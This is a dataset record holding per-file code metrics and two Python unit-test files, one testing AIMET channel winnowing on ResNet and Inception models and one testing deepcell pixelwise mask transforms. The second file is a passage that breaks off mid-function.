| 0.593987
| 5,869
| 51,252
| 5.128983
| 0.068325
| 0.036476
| 0.049432
| 0.018736
| 0.965816
| 0.964554
| 0.959239
| 0.954854
| 0.943891
| 0.928742
| 0
| 0.006507
| 0.307344
| 51,252
| 1,062
| 308
| 48.259887
| 0.841183
| 0.400219
| 0
| 0.83956
| 0
| 0.008791
| 0.21385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.008791
| 0
| 0.164835
| 0.162637
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
09d20ac781c870ac748bc3f78389e9071d58baae
| 26,730
|
py
|
Python
|
NightlyTests/torch/test_winnow_resnet18.py
|
lipovsek/aimet
|
236fb02cc6c45e65c067030416c49a09ace82045
|
[
"BSD-3-Clause"
] | 945
|
2020-04-30T02:23:55.000Z
|
2022-03-31T08:44:32.000Z
|
NightlyTests/torch/test_winnow_resnet18.py
|
lipovsek/aimet
|
236fb02cc6c45e65c067030416c49a09ace82045
|
[
"BSD-3-Clause"
] | 563
|
2020-05-01T03:07:22.000Z
|
2022-03-30T05:35:58.000Z
|
NightlyTests/torch/test_winnow_resnet18.py
|
lipovsek/aimet
|
236fb02cc6c45e65c067030416c49a09ace82045
|
[
"BSD-3-Clause"
] | 186
|
2020-04-30T00:55:26.000Z
|
2022-03-30T09:54:51.000Z
|
#/usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2017-2018, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
""" Winnowing acceptance tests for ResNet models. """
import unittest
import torch
from torchvision import models
from aimet_torch.winnow.winnow import winnow_model
from aimet_common.winnow.winnow_utils import OpConnectivity, ConnectivityType
class WinnowResNet18Test(unittest.TestCase):
""" Acceptance tests related to winnowing ResNet models. """
def test_winnowing_multiple_zeroed_resnet34(self):
""" Tests winnowing resnet18 with multiple layers with zero planes. """
model = models.resnet34(pretrained=False)
model.eval()
# Test forward pass on the copied model before zeroing out channels in any layer..
input_shape = [1, 3, 224, 224]
list_of_modules_to_winnow = []
input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
list_of_modules_to_winnow.append((model.layer4[1].conv2, input_channels_to_prune))
input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
list_of_modules_to_winnow.append((model.layer4[0].conv1, input_channels_to_prune))
input_channels_to_prune = [15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9]
list_of_modules_to_winnow.append((model.layer3[1].conv2, input_channels_to_prune))
input_channels_to_prune = [33, 44, 55]
list_of_modules_to_winnow.append((model.layer2[1].conv2, input_channels_to_prune))
input_channels_to_prune = [11, 12, 13, 14, 15]
list_of_modules_to_winnow.append((model.layer2[0].conv2, input_channels_to_prune))
input_channels_to_prune = [55, 56, 57, 58, 59]
list_of_modules_to_winnow.append((model.layer1[1].conv1, input_channels_to_prune))
input_channels_to_prune = [42, 44, 46]
list_of_modules_to_winnow.append((model.layer1[0].conv2, input_channels_to_prune))
# Call the Winnow API.
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
# compare zeroed out and pruned model output
# use double precision for lower absolute error
input_tensor = torch.rand(input_shape).double()
model.double()
model.eval()
validation_output = model(input_tensor)
# validate winnowed net
new_model.double()
new_model.eval()
test_output = new_model(input_tensor)
self.assertTrue(test_output.shape == validation_output.shape)
# layer1.0.conv2 input channels pruned from 64 --> 61
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer1[0].conv2.in_channels, 61)
self.assertEqual(list(new_model.layer1[0].conv2.weight.shape), [64, 61, 3, 3])
self.assertEqual(new_model.layer1[0].conv1.out_channels, 61)
# layer1.1.conv1 output channels pruned from 64 --> 59
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer1[1].conv1[1].in_channels, 59)
self.assertEqual(list(new_model.layer1[1].conv1[1].weight.shape), [64, 59, 3, 3])
# layer2.0.conv2 input channels pruned from 128 --> 123
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer2[0].conv2.in_channels, 123)
self.assertEqual(list(new_model.layer2[0].conv2.weight.shape), [128, 123, 3, 3])
self.assertEqual(new_model.layer2[0].conv1.out_channels, 123)
# layer2.1.conv2 input channels pruned from 128 --> 125
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer2[1].conv2.in_channels, 125)
self.assertEqual(list(new_model.layer2[1].conv2.weight.shape), [128, 125, 3, 3])
self.assertEqual(new_model.layer2[1].conv1.out_channels, 125)
# layer3.1.conv2 input channels pruned from 256 --> 245
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer3[1].conv2.in_channels, 245)
self.assertEqual(list(new_model.layer3[1].conv2.weight.shape), [256, 245, 3, 3])
self.assertEqual(new_model.layer3[1].conv1.out_channels, 245)
# layer4.0.conv1 input channels pruned from 256 --> 245
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer4[0].conv1[1].in_channels, 245)
self.assertEqual(list(new_model.layer4[0].conv1[1].weight.shape), [512, 245, 3, 3])
# layer4.1.conv2 input channels pruned from 512 --> 501
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer4[1].conv2.in_channels, 501)
self.assertEqual(list(new_model.layer4[1].conv2.weight.shape), [512, 501, 3, 3])
self.assertEqual(new_model.layer4[1].conv1.out_channels, 501)
def test_winnowing_multiple_zeroed_resnet50(self):
""" Tests winnowing resnet18 with multiple layers with zero planes. """
model = models.resnet50(pretrained=False)
model.eval()
input_shape = [1, 3, 224, 224]
list_of_modules_to_winnow = []
input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
list_of_modules_to_winnow.append((model.layer4[1].conv2, input_channels_to_prune))
input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
list_of_modules_to_winnow.append((model.layer4[0].conv1, input_channels_to_prune))
input_channels_to_prune = [15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9]
list_of_modules_to_winnow.append((model.layer3[1].conv2, input_channels_to_prune))
input_channels_to_prune = [33, 44, 55]
list_of_modules_to_winnow.append((model.layer2[1].conv2, input_channels_to_prune))
input_channels_to_prune = [11, 12, 13, 14, 15]
list_of_modules_to_winnow.append((model.layer2[0].conv2, input_channels_to_prune))
input_channels_to_prune = [55, 56, 57, 58, 59]
list_of_modules_to_winnow.append((model.layer1[1].conv1, input_channels_to_prune))
input_channels_to_prune = [42, 44, 46]
list_of_modules_to_winnow.append((model.layer1[0].conv2, input_channels_to_prune))
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
# compare zeroed out and pruned model output
# use double precision for lower absolute error
input_tensor = torch.rand(input_shape).double()
model.double()
model.eval()
validation_output = model(input_tensor)
# validate winnowed net
new_model.double()
new_model.eval()
test_output = new_model(input_tensor)
self.assertTrue(test_output.shape == validation_output.shape)
# layer1.0.conv2 input channels pruned from 64 --> 61
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer1[0].conv2.in_channels, 61)
self.assertEqual(list(new_model.layer1[0].conv2.weight.shape), [64, 61, 3, 3])
self.assertEqual(new_model.layer1[0].conv1.out_channels, 61)
# layer1.1.conv1 output channels pruned from 64 --> 59
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer1[1].conv1[1].in_channels, 251)
self.assertEqual(list(new_model.layer1[1].conv1[1].weight.shape), [64, 251, 1, 1])
# layer2.0.conv2 input channels pruned from 128 --> 123
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer2[0].conv2.in_channels, 123)
self.assertEqual(list(new_model.layer2[0].conv2.weight.shape), [128, 123, 3, 3])
self.assertEqual(new_model.layer2[0].conv1.out_channels, 123)
# layer2.1.conv2 input channels pruned from 128 --> 125
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer2[1].conv2.in_channels, 125)
self.assertEqual(list(new_model.layer2[1].conv2.weight.shape), [128, 125, 3, 3])
self.assertEqual(new_model.layer2[1].conv1.out_channels, 125)
# layer3.1.conv2 input channels pruned from 256 --> 245
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer3[1].conv2.in_channels, 245)
self.assertEqual(list(new_model.layer3[1].conv2.weight.shape), [256, 245, 3, 3])
self.assertEqual(new_model.layer3[1].conv1.out_channels, 245)
# layer4.0.conv1 input channels pruned from 256 --> 245
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer4[0].conv1[1].in_channels, 1013)
self.assertEqual(list(new_model.layer4[0].conv1[1].weight.shape), [512, 1013, 1, 1])
# layer4.1.conv2 input channels pruned from 512 --> 501
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer4[1].conv2.in_channels, 501)
self.assertEqual(list(new_model.layer4[1].conv2.weight.shape), [512, 501, 3, 3])
self.assertEqual(new_model.layer4[1].conv1.out_channels, 501)
def test_winnowing_multiple_zeroed_resnet101(self):
""" Tests winnowing resnet18 with multiple layers with zero planes. """
model = models.resnet101(pretrained=False)
model.eval()
input_shape = [1, 3, 224, 224]
list_of_modules_to_winnow = []
# For layer4[1].conv2 layer, zero out input channels 5, 9, 14, 18, 23, 27, 32, 36, 41, 44, 54
input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
list_of_modules_to_winnow.append((model.layer4[1].conv2, input_channels_to_prune))
# For layer4[0].conv1 layer, zero out input channels 5, 9, 14, 18, 23, 27, 32, 36, 41, 44, 54
input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
list_of_modules_to_winnow.append((model.layer4[0].conv1, input_channels_to_prune))
# For layer3[1].conv2 layer, zero out input channels 15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9
input_channels_to_prune = [15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9]
list_of_modules_to_winnow.append((model.layer3[1].conv2, input_channels_to_prune))
# For layer2[1].conv2 layer, zero out input channels 33, 44, 55
input_channels_to_prune = [33, 44, 55]
list_of_modules_to_winnow.append((model.layer2[1].conv2, input_channels_to_prune))
# For layer2[0].conv2 layer, zero out input channels 1, 12, 13, 14, 15
input_channels_to_prune = [11, 12, 13, 14, 15]
list_of_modules_to_winnow.append((model.layer2[0].conv2, input_channels_to_prune))
# For layer1[1].conv1 layer, zero out input channels 55, 56, 57, 58, 59
input_channels_to_prune = [55, 56, 57, 58, 59]
list_of_modules_to_winnow.append((model.layer1[1].conv1, input_channels_to_prune))
# For layer1[0].conv2 layer, zero out input channels 42, 44, 36
input_channels_to_prune = [42, 44, 46]
list_of_modules_to_winnow.append((model.layer1[0].conv2, input_channels_to_prune))
# Call the Winnow API.
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
input_tensor = torch.rand(input_shape).double()
model.double()
model.eval()
validation_output = model(input_tensor)
# validate winnowed net
new_model.double()
new_model.eval()
test_output = new_model(input_tensor)
self.assertTrue(test_output.shape == validation_output.shape)
# layer1.0.conv2 input channels pruned from 64 --> 61
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer1[0].conv2.in_channels, 61)
self.assertEqual(list(new_model.layer1[0].conv2.weight.shape), [64, 61, 3, 3])
self.assertEqual(new_model.layer1[0].conv1.out_channels, 61)
# layer1.1.conv1 output channels pruned from 64 --> 59
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer1[1].conv1[1].in_channels, 251)
self.assertEqual(list(new_model.layer1[1].conv1[1].weight.shape), [64, 251, 1, 1])
# layer2.0.conv2 input channels pruned from 128 --> 123
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer2[0].conv2.in_channels, 123)
self.assertEqual(list(new_model.layer2[0].conv2.weight.shape), [128, 123, 3, 3])
self.assertEqual(new_model.layer2[0].conv1.out_channels, 123)
# layer2.1.conv2 input channels pruned from 128 --> 125
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer2[1].conv2.in_channels, 125)
self.assertEqual(list(new_model.layer2[1].conv2.weight.shape), [128, 125, 3, 3])
self.assertEqual(new_model.layer2[1].conv1.out_channels, 125)
# layer3.1.conv2 input channels pruned from 256 --> 245
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer3[1].conv2.in_channels, 245)
self.assertEqual(list(new_model.layer3[1].conv2.weight.shape), [256, 245, 3, 3])
self.assertEqual(new_model.layer3[1].conv1.out_channels, 245)
# layer4.0.conv1 input channels pruned from 256 --> 245
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer4[0].conv1[1].in_channels, 1013)
self.assertEqual(list(new_model.layer4[0].conv1[1].weight.shape), [512, 1013, 1, 1])
# layer4.1.conv2 input channels pruned from 512 --> 501
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer4[1].conv2.in_channels, 501)
self.assertEqual(list(new_model.layer4[1].conv2.weight.shape), [512, 501, 3, 3])
self.assertEqual(new_model.layer4[1].conv1.out_channels, 501)
def test_winnowing_multiple_zeroed_resnet152(self):
""" Tests winnowing resnet18 with multiple layers with zero planes. """
model = models.resnet152(pretrained=False)
model.eval()
# Test forward pass on the copied model before zeroing out channels in any layer..
input_shape = [1, 3, 224, 224]
list_of_modules_to_winnow = []
# For layer4[1].conv2 layer, zero out input channels 5, 9, 14, 18, 23, 27, 32, 36, 41, 44, 54
input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
list_of_modules_to_winnow.append((model.layer4[1].conv2, input_channels_to_prune))
# For layer4[0].conv1 layer, zero out input channels 5, 9, 14, 18, 23, 27, 32, 36, 41, 44, 54
input_channels_to_prune = [5, 9, 14, 18, 23, 27, 32, 36, 41, 45, 54]
list_of_modules_to_winnow.append((model.layer4[0].conv1, input_channels_to_prune))
# For layer3[1].conv2 layer, zero out input channels 15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9
input_channels_to_prune = [15, 29, 24, 28, 33, 47, 2, 3, 1, 5, 9]
list_of_modules_to_winnow.append((model.layer3[1].conv2, input_channels_to_prune))
# For layer2[1].conv2 layer, zero out input channels 33, 44, 55
input_channels_to_prune = [33, 44, 55]
list_of_modules_to_winnow.append((model.layer2[1].conv2, input_channels_to_prune))
# For layer2[0].conv2 layer, zero out input channels 1, 12, 13, 14, 15
input_channels_to_prune = [11, 12, 13, 14, 15]
list_of_modules_to_winnow.append((model.layer2[0].conv2, input_channels_to_prune))
# For layer1[1].conv1 layer, zero out input channels 55, 56, 57, 58, 59
input_channels_to_prune = [55, 56, 57, 58, 59]
list_of_modules_to_winnow.append((model.layer1[1].conv1, input_channels_to_prune))
# For layer1[0].conv2 layer, zero out input channels 42, 44, 36
input_channels_to_prune = [42, 44, 46]
list_of_modules_to_winnow.append((model.layer1[0].conv2, input_channels_to_prune))
# Call the Winnow API.
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
# compare zeroed out and pruned model output:
# use double precision for lower absolute error
input_tensor = torch.rand(input_shape).double()
model.double()
model.eval()
validation_output = model(input_tensor)
# validate winnowed net
new_model.double()
new_model.eval()
test_output = new_model(input_tensor)
self.assertTrue(test_output.shape == validation_output.shape)
# layer1.0.conv2 input channels pruned from 64 --> 61
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer1[0].conv2.in_channels, 61)
self.assertEqual(list(new_model.layer1[0].conv2.weight.shape), [64, 61, 3, 3])
self.assertEqual(new_model.layer1[0].conv1.out_channels, 61)
# layer1.1.conv1 output channels pruned from 64 --> 59
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer1[1].conv1[1].in_channels, 251)
self.assertEqual(list(new_model.layer1[1].conv1[1].weight.shape), [64, 251, 1, 1])
# layer2.0.conv2 input channels pruned from 128 --> 123
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer2[0].conv2.in_channels, 123)
self.assertEqual(list(new_model.layer2[0].conv2.weight.shape), [128, 123, 3, 3])
self.assertEqual(new_model.layer2[0].conv1.out_channels, 123)
# layer2.1.conv2 input channels pruned from 128 --> 125
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer2[1].conv2.in_channels, 125)
self.assertEqual(list(new_model.layer2[1].conv2.weight.shape), [128, 125, 3, 3])
self.assertEqual(new_model.layer2[1].conv1.out_channels, 125)
# layer3.1.conv2 input channels pruned from 256 --> 245
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer3[1].conv2.in_channels, 245)
self.assertEqual(list(new_model.layer3[1].conv2.weight.shape), [256, 245, 3, 3])
self.assertEqual(new_model.layer3[1].conv1.out_channels, 245)
# layer4.0.conv1 input channels pruned from 256 --> 245
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer4[0].conv1[1].in_channels, 1013)
self.assertEqual(list(new_model.layer4[0].conv1[1].weight.shape), [512, 1013, 1, 1])
# layer4.1.conv2 input channels pruned from 512 --> 501
# weight (Tensor) : [out_channels, in_channels, kernel_size, kernel_size]
self.assertEqual(new_model.layer4[1].conv2.in_channels, 501)
self.assertEqual(list(new_model.layer4[1].conv2.weight.shape), [512, 501, 3, 3])
self.assertEqual(new_model.layer4[1].conv1.out_channels, 501)
def test_inception_model_conv_below_conv(self):
""" Test winnowing inception model conv below conv """
# These modules are included as a hack to allow tests using inception model to pass,
# as the model uses functionals instead of modules.
OpConnectivity.pytorch_dict['relu'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['max_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['avg_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['adaptive_avg_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['dropout'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['flatten'] = ConnectivityType.skip
model = models.Inception3()
model.eval()
input_shape = [1, 3, 299, 299]
input_channels_to_prune = [1, 3, 5, 7, 9, 15, 32, 45]
list_of_modules_to_winnow = [(model.Mixed_5b.branch3x3dbl_2.conv, input_channels_to_prune)]
print(model.Mixed_5b.branch3x3dbl_1.conv.out_channels)
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
self.assertEqual(new_model.Mixed_5b.branch3x3dbl_1.conv.out_channels, 56)
self.assertEqual(list(new_model.Mixed_5b.branch3x3dbl_1.conv.weight.shape), [56, 192, 1, 1])
del model
del new_model
def test_inception_model_conv_below_split(self):
""" Test winnowing inception model with conv below split """
# These modules are included as a hack to allow tests using inception model to pass,
# as the model uses functionals instead of modules.
OpConnectivity.pytorch_dict['relu'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['max_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['avg_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['adaptive_avg_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['dropout'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['flatten'] = ConnectivityType.skip
model = models.Inception3()
model.eval()
input_shape = [1, 3, 299, 299]
input_channels_to_prune = [1, 3, 5, 7, 9, 15, 32, 45]
list_of_modules_to_winnow = [(model.Mixed_5b.branch3x3dbl_1.conv, input_channels_to_prune)]
print(model.Mixed_5b.branch3x3dbl_1.conv.out_channels)
# Call the Winnow API.
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
del model
del new_model
model = models.Inception3()
model.eval()
input_shape = [1, 3, 299, 299]
input_channels_to_prune = [1, 3, 5, 7, 9, 15, 32, 45]
list_of_modules_to_winnow = [(model.Mixed_5b.branch1x1.conv, input_channels_to_prune)]
print(model.Mixed_5b.branch3x3dbl_1.conv.out_channels)
# Call the Winnow API.
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
del model
del new_model
self.assertEqual(0, 0)
def test_inception_model_conv_below_avgpool(self):
""" Test winnowing inception model with conv below avgpool """
# These modules are included as a hack to allow tests using inception model to pass,
# as the model uses functionals instead of modules.
OpConnectivity.pytorch_dict['relu'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['max_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['avg_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['adaptive_avg_pool2d'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['dropout'] = ConnectivityType.direct
OpConnectivity.pytorch_dict['flatten'] = ConnectivityType.skip
model = models.Inception3()
model.eval()
input_shape = [1, 3, 299, 299]
input_channels_to_prune = [1, 3, 5, 7, 9, 15, 32, 45]
list_of_modules_to_winnow = [(model.Mixed_5b.branch_pool.conv, input_channels_to_prune)]
print(model.Mixed_5b.branch_pool.conv)
print(model.Mixed_5b.branch_pool.conv.out_channels, model.Mixed_5b.branch_pool.conv.in_channels)
# Call the Winnow API.
new_model, _ = winnow_model(model, input_shape,
list_of_modules_to_winnow,
reshape=True, in_place=False, verbose=True)
self.assertEqual(new_model.Mixed_5b.branch_pool.conv[1].out_channels, 32)
self.assertEqual(list(new_model.Mixed_5b.branch_pool.conv[1].weight.shape), [32, 184, 1, 1])
del model
del new_model
| 51.01145
| 104
| 0.669547
| 3,689
| 26,730
| 4.633776
| 0.081052
| 0.048672
| 0.05616
| 0.07488
| 0.905932
| 0.898561
| 0.891541
| 0.882356
| 0.872762
| 0.870364
| 0
| 0.081712
| 0.215264
| 26,730
| 523
| 105
| 51.108987
| 0.733219
| 0.299514
| 0
| 0.882784
| 0
| 0
| 0.009224
| 0
| 0
| 0
| 0
| 0
| 0.311355
| 1
| 0.025641
| false
| 0
| 0.018315
| 0
| 0.047619
| 0.018315
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
11312f55bfe57e8bcecfc32f11fdb8175ac90757
| 20,219
|
py
|
Python
|
deepcell/utils/transform_utils_test.py
|
jizhouh/deepcell-tf
|
491ece59f5024d73429477ebdcb437a6e67d766b
|
[
"Apache-2.0"
] | 250
|
2018-09-19T23:55:06.000Z
|
2022-03-30T02:20:52.000Z
|
deepcell/utils/transform_utils_test.py
|
jizhouh/deepcell-tf
|
491ece59f5024d73429477ebdcb437a6e67d766b
|
[
"Apache-2.0"
] | 251
|
2018-09-21T17:09:43.000Z
|
2022-02-28T19:04:50.000Z
|
deepcell/utils/transform_utils_test.py
|
jizhouh/deepcell-tf
|
491ece59f5024d73429477ebdcb437a6e67d766b
|
[
"Apache-2.0"
] | 64
|
2018-11-29T15:22:15.000Z
|
2022-03-21T03:37:43.000Z
|
# Copyright 2016-2021 The Van Valen Lab at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/deepcell-tf/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# vanvalenlab@gmail.com
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for transform_utils"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from skimage.measure import label
from tensorflow.python.platform import test
from tensorflow.keras import backend as K
from deepcell.utils import transform_utils
def _get_image(img_h=300, img_w=300):
bias = np.random.rand(img_w, img_h) * 64
variance = np.random.rand(img_w, img_h) * (255 - 64)
img = np.random.rand(img_w, img_h) * variance + bias
return img
def _generate_test_masks():
img_w = img_h = 30
mask_images = []
for _ in range(8):
imarray = np.random.randint(2, size=(img_w, img_h, 1))
mask_images.append(imarray)
return mask_images
class TransformUtilsTest(test.TestCase):
def test_pixelwise_transform_2d(self):
with self.cached_session():
K.set_image_data_format('channels_last')
# test single edge class
for img in _generate_test_masks():
img = label(img)
img = np.squeeze(img)
pw_img = transform_utils.pixelwise_transform(
img, data_format=None, separate_edge_classes=False)
pw_img_dil = transform_utils.pixelwise_transform(
img, dilation_radius=1,
data_format='channels_last',
separate_edge_classes=False)
self.assertEqual(pw_img.shape[-1], 3)
self.assertEqual(pw_img_dil.shape[-1], 3)
assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1],
img > 0)))
self.assertGreater(
pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(),
pw_img[..., 0].sum() + pw_img[..., 1].sum())
# test separate edge classes
for img in _generate_test_masks():
img = label(img)
img = np.squeeze(img)
pw_img = transform_utils.pixelwise_transform(
img, data_format=None, separate_edge_classes=True)
pw_img_dil = transform_utils.pixelwise_transform(
img, dilation_radius=1,
data_format='channels_last',
separate_edge_classes=True)
self.assertEqual(pw_img.shape[-1], 4)
self.assertEqual(pw_img_dil.shape[-1], 4)
assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1] +
pw_img[..., 2], img > 0)))
self.assertGreater(
pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(),
pw_img[..., 0].sum() + pw_img[..., 1].sum())
def test_pixelwise_transform_3d(self):
frames = 10
img_list = []
for img in _generate_test_masks():
frame_list = []
for _ in range(frames):
frame_list.append(label(img))
img_stack = np.array(frame_list)
img_list.append(img_stack)
with self.cached_session():
K.set_image_data_format('channels_last')
# test single edge class
maskstack = np.vstack(img_list)
batch_count = maskstack.shape[0] // frames
new_shape = tuple([batch_count, frames] +
list(maskstack.shape[1:]))
maskstack = np.reshape(maskstack, new_shape)
for i in range(maskstack.shape[0]):
img = maskstack[i, ...]
img = np.squeeze(img)
pw_img = transform_utils.pixelwise_transform(
img, data_format=None, separate_edge_classes=False)
pw_img_dil = transform_utils.pixelwise_transform(
img, dilation_radius=2,
data_format='channels_last',
separate_edge_classes=False)
self.assertEqual(pw_img.shape[-1], 3)
self.assertEqual(pw_img_dil.shape[-1], 3)
assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1],
img > 0)))
self.assertGreater(
pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(),
pw_img[..., 0].sum() + pw_img[..., 1].sum())
# test separate edge classes
maskstack = np.vstack(img_list)
batch_count = maskstack.shape[0] // frames
new_shape = tuple([batch_count, frames] +
list(maskstack.shape[1:]))
maskstack = np.reshape(maskstack, new_shape)
for i in range(maskstack.shape[0]):
img = maskstack[i, ...]
img = np.squeeze(img)
pw_img = transform_utils.pixelwise_transform(
img, data_format=None, separate_edge_classes=True)
